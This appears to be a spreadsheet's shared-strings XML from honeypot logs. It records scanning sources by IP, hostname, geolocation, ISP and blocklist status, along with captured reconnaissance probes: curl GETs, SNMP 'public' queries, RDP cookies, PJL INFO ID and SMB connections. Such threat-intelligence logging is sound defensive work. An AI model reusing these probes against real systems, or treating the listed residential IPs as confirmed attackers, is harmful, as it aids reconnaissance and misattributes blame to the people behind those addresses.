    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_SSH_H13&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H15</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;55962&amp;&amp;23&amp;&amp;23448&amp;&amp;53712&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7220:f9e3</t>
  </si>
  <si>
    <t>fa2228b0a93b431791ea4978148f5194</t>
  </si>
  <si>
    <t>114.33.72.89</t>
  </si>
  <si>
    <t>114-33-72-89.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H25</t>
  </si>
  <si>
    <t>23&amp;&amp;NA&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:7221:4859</t>
  </si>
  <si>
    <t>eaf5d4b25e29d3a5a32d875e9a0ce7a4</t>
  </si>
  <si>
    <t>117.208.124.143</t>
  </si>
  <si>
    <t>::ffff:75d0:7c8f</t>
  </si>
  <si>
    <t>01ce7d36559b2ae0489c7a22cb08fd3c</t>
  </si>
  <si>
    <t>118.171.34.148</t>
  </si>
  <si>
    <t>NA&amp;&amp;118-171-34-148.dynamic-ip.hinet.net</t>
  </si>
  <si>
    <t>::ffff:76ab:2294</t>
  </si>
  <si>
    <t>e3e3a741d0cf49d6f0691f4c6aef62b1</t>
  </si>
  <si>
    <t>27.122.60.194</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_POSTGRES_H47</t>
  </si>
  <si>
    <t>{'b.barracudacentral.org': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['spam'&amp;&amp; 'exploits']}</t>
  </si>
  <si>
    <t>::ffff:1b7a:3cc2</t>
  </si>
  <si>
    <t>113bcdf79f57e6e46022923d102a99e0</t>
  </si>
  <si>
    <t>117.247.87.9</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (117.247.87.9,49710)}&amp;&amp;{Data_SMB:Incoming connection (117.247.87.9,50487)}</t>
  </si>
  <si>
    <t>::ffff:75f7:5709</t>
  </si>
  <si>
    <t>9e752c246ed3254dbf0664f367313944</t>
  </si>
  <si>
    <t>59.126.65.199</t>
  </si>
  <si>
    <t>NA&amp;&amp;59-126-65-199.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H6</t>
  </si>
  <si>
    <t>::ffff:3b7e:41c7</t>
  </si>
  <si>
    <t>af0f6e5fc46b91900613e810e1e40332</t>
  </si>
  <si>
    <t>220.132.170.229</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-132-170-229.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H31</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5014&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc84:aae5</t>
  </si>
  <si>
    <t>8ea0fc039fca7c1e760e939a37f7b811</t>
  </si>
  <si>
    <t>122.176.113.249</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_SSH_H39&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H5</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;40192&amp;&amp;22&amp;&amp;34063&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7ab0:71f9</t>
  </si>
  <si>
    <t>361c133c837fdc924b494c3560dd573d</t>
  </si>
  <si>
    <t>38.60.202.99</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H10</t>
  </si>
  <si>
    <t>20040 64619</t>
  </si>
  <si>
    <t>25.2048</t>
  </si>
  <si>
    <t>55.2708</t>
  </si>
  <si>
    <t>138915</t>
  </si>
  <si>
    <t>Kaopu Cloud HK Limited</t>
  </si>
  <si>
    <t>LightNode-AE</t>
  </si>
  <si>
    <t>::ffff:263c:ca63</t>
  </si>
  <si>
    <t>54b75427c251441dae36209e83deba43</t>
  </si>
  <si>
    <t>72.252.136.147</t>
  </si>
  <si>
    <t>JM</t>
  </si>
  <si>
    <t>Jamaica</t>
  </si>
  <si>
    <t>Saint Andrew Parish</t>
  </si>
  <si>
    <t>New Kingston</t>
  </si>
  <si>
    <t>Kingston</t>
  </si>
  <si>
    <t>3489854</t>
  </si>
  <si>
    <t>18.0073</t>
  </si>
  <si>
    <t>-76.785</t>
  </si>
  <si>
    <t>30689</t>
  </si>
  <si>
    <t>FLOW</t>
  </si>
  <si>
    <t>Columbus Networks USA</t>
  </si>
  <si>
    <t>Columbus Communication Jamaica Limited, Merit Communication Limited</t>
  </si>
  <si>
    <t>2005-01-19</t>
  </si>
  <si>
    <t>COLUMBUS-NETWORKS-3</t>
  </si>
  <si>
    <t>2017-03-08</t>
  </si>
  <si>
    <t>::ffff:48fc:8893</t>
  </si>
  <si>
    <t>8e6c9a3bd7177313814641706243abce</t>
  </si>
  <si>
    <t>1.34.76.241</t>
  </si>
  <si>
    <t>1-34-76-241.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H30</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;53&amp;&amp;7445&amp;&amp;80&amp;&amp;57019&amp;&amp;25673</t>
  </si>
  <si>
    <t>::ffff:122:4cf1</t>
  </si>
  <si>
    <t>937e5b44508e05e191bc2a5882c5777b</t>
  </si>
  <si>
    <t>59.91.247.210</t>
  </si>
  <si>
    <t>::ffff:3b5b:f7d2</t>
  </si>
  <si>
    <t>55f4503ae0f11a9f8300472df2d86fc9</t>
  </si>
  <si>
    <t>122.116.98.125</t>
  </si>
  <si>
    <t>122-116-98-125.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H23</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;80&amp;&amp;23&amp;&amp;33690&amp;&amp;53004&amp;&amp;9100&amp;&amp;26052&amp;&amp;52225</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7a74:627d</t>
  </si>
  <si>
    <t>662927a152f4b0c992239ce2ce80444f</t>
  </si>
  <si>
    <t>49.0.66.199</t>
  </si>
  <si>
    <t>133481</t>
  </si>
  <si>
    <t>AIS-Fibre</t>
  </si>
  <si>
    <t>TH-AIS-Fibre</t>
  </si>
  <si>
    <t>::ffff:3100:42c7</t>
  </si>
  <si>
    <t>bf6ced1cd7d44580c31a61c1b6f4aa1c</t>
  </si>
  <si>
    <t>59.89.20.187</t>
  </si>
  <si>
    <t>::ffff:3b59:14bb</t>
  </si>
  <si>
    <t>cb9e8a80b6fc4725246b419eb2e008e7</t>
  </si>
  <si>
    <t>116.75.212.68</t>
  </si>
  <si>
    <t>::ffff:744b:d444</t>
  </si>
  <si>
    <t>ab713ca7f8b2186d28dec346670de24f</t>
  </si>
  <si>
    <t>103.133.126.73</t>
  </si>
  <si>
    <t>1259229</t>
  </si>
  <si>
    <t>411001</t>
  </si>
  <si>
    <t>18.5204</t>
  </si>
  <si>
    <t>73.8567</t>
  </si>
  <si>
    <t>138278</t>
  </si>
  <si>
    <t>Nikita Broadband Pvt. Ltd.</t>
  </si>
  <si>
    <t>Nikita Broadband Pvt. Ltd</t>
  </si>
  <si>
    <t>NIKITABR</t>
  </si>
  <si>
    <t>::ffff:6785:7e49</t>
  </si>
  <si>
    <t>7634fbe6678f218e3e9e247e527eb644</t>
  </si>
  <si>
    <t>59.93.235.69</t>
  </si>
  <si>
    <t>::ffff:3b5d:eb45</t>
  </si>
  <si>
    <t>4d3a2101dc292b7bbebc9ed1d5b65663</t>
  </si>
  <si>
    <t>121.146.31.141</t>
  </si>
  <si>
    <t>Ulsan</t>
  </si>
  <si>
    <t>Bangu-dong</t>
  </si>
  <si>
    <t>8691893</t>
  </si>
  <si>
    <t>681260</t>
  </si>
  <si>
    <t>35.557</t>
  </si>
  <si>
    <t>129.344</t>
  </si>
  <si>
    <t>::ffff:7992:1f8d</t>
  </si>
  <si>
    <t>3238e371490c4094d1cf168d3d5fab60</t>
  </si>
  <si>
    <t>193.151.59.175</t>
  </si>
  <si>
    <t>NA&amp;&amp;175.59.151.193.it-tv.org</t>
  </si>
  <si>
    <t>Darnytsia</t>
  </si>
  <si>
    <t>50.4018</t>
  </si>
  <si>
    <t>30.6498</t>
  </si>
  <si>
    <t>31350</t>
  </si>
  <si>
    <t>Private enterprise ITM</t>
  </si>
  <si>
    <t>End</t>
  </si>
  <si>
    <t>::ffff:c197:3baf</t>
  </si>
  <si>
    <t>039728c57ab124d752029f5c49dad45b</t>
  </si>
  <si>
    <t>118.33.175.159</t>
  </si>
  <si>
    <t>Guri-si</t>
  </si>
  <si>
    <t>Guri-si (Sutaek-dong)</t>
  </si>
  <si>
    <t>1841988</t>
  </si>
  <si>
    <t>37.5946</t>
  </si>
  <si>
    <t>127.149</t>
  </si>
  <si>
    <t>::ffff:7621:af9f</t>
  </si>
  <si>
    <t>d517cc2b585c16404c5ff9f000492f92</t>
  </si>
  <si>
    <t>147.185.132.120</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H3&amp;&amp;SMA-LAB_SSH_H33&amp;&amp;SMA-LAB_IPP_H8&amp;&amp;SMA-LAB_SMB_H15&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_HTTP_H28&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_IMAP_H18&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_SSH_H22&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_FTP_H10&amp;&amp;SMA-LAB_LDAP_H18&amp;&amp;SMA-LAB_SIP_H23&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_SOCKS5_H47&amp;&amp;SMA-LAB_IMAP_H16&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_SNMP_H41&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_SMB_H9&amp;&amp;SMA-LAB_REDIS_H19&amp;&amp;SMA-LAB_SNMP_H13&amp;&amp;SMA-LAB_IMAP_H7&amp;&amp;SMA-LAB_ORACLE_H14&amp;&amp;SMA-LAB_LDAP_H4&amp;&amp;SMA-LAB_LDAP_H13&amp;&amp;SMA-LAB_SOCKS5_H34&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_IMAP_H32&amp;&amp;SMA-LAB_SNMP_H17&amp;&amp;SMA-LAB_IMAP_H6&amp;&amp;SMA-LAB_FTP_H24&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_IRC_H35&amp;&amp;SMA-LAB_SNMP_H8&amp;&amp;SMA-LAB_IMAP_H2&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_SNMP_H15&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_LDAP_H8&amp;&amp;SMA-LAB_IMAP_H45&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_POP3_H40&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_FTP_H8&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_ORACLE_H5&amp;&amp;SMA-LAB_MYSQL_H39&amp;&amp;SMA-LAB_SNMP_H47&amp;&amp;SMA-LAB_ORACLE_H15&amp;&amp;SMA-LAB_SNMP_H37&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_ORACLE_H22&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_NTP_H11&amp;&amp;SMA-LAB_REDIS_H34&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_SNMP_H2&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_IMAP_H36&amp;&amp;SMA-LAB_ORACLE_H8&amp;&amp;SMA-LAB_MYSQL_H9&amp;&amp;SMA-LAB_IMAP_H9&amp;&amp;SMA-LAB_SNMP_H40&amp;&amp;SMA-LAB_POSTGRES_H34&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_FTP_H35&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_MSSQL_H38&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_RDP_H14&amp;&amp;SMA-LAB_PJL_H28&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_MSSQL_H41&amp;&amp;SMA-LAB_SMB_H5&amp;&amp;SMA-LAB_LDAP_H47&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_SOCKS5_H9&amp;&amp;SMA-LAB_ORACLE_H23&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_ORACLE_H19&amp;&amp;SMA-LAB_SIP_H47&amp;&amp;SMA-LAB_IMAP_H10&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_POSTGRES_H28&amp;&amp;SMA-LAB_ORACLE_H32&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_MYSQL_H27&amp;&amp;SMA-LAB_ORACLE_H30&amp;&amp;SMA-LAB_POP3_H19&amp;&amp;SMA-LAB_REDIS_H46&amp;&amp;SMA-LAB_POP3_H17</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;22&amp;&amp;631&amp;&amp;445&amp;&amp;443&amp;&amp;80&amp;&amp;9100&amp;&amp;5900&amp;&amp;62738&amp;&amp;143&amp;&amp;3389&amp;&amp;22&amp;&amp;2920&amp;&amp;21&amp;&amp;NA&amp;&amp;1080&amp;&amp;161&amp;&amp;51332&amp;&amp;6379&amp;&amp;1521&amp;&amp;49862&amp;&amp;6667&amp;&amp;110&amp;&amp;3306&amp;&amp;5432&amp;&amp;53746&amp;&amp;1433&amp;&amp;23&amp;&amp;54032&amp;&amp;55117&amp;&amp;49471&amp;&amp;54331&amp;&amp;53988&amp;&amp;50892&amp;&amp;51091</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;command&amp;&amp;GET&amp;&amp;stshash&amp;&amp;request&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.120,65230)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.120,65236)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.120,65238)}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.120,64698)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.120,64700)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.120,64708)}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=aiOuuYzpG'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=OVqBmv'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GjVoNe'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=vJbcDkYLr'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ZEcNFI'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=yjSzZy'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=lNpIxpUAP'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=JvQcnH'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NfRUEY'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.120,60646)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.120,60648)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.120,60656)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.120,59240)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.120,59186)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.120,59196)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.120,59210)}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=mtjVxEYSb'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=rGaTDs'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=WNjtiN'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=JVHeYAEVe'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=LYLKZX'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=KYEOTh'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=rVKJhxccZ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=aMUgLf'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qdcADa'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=EyADzpifn'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
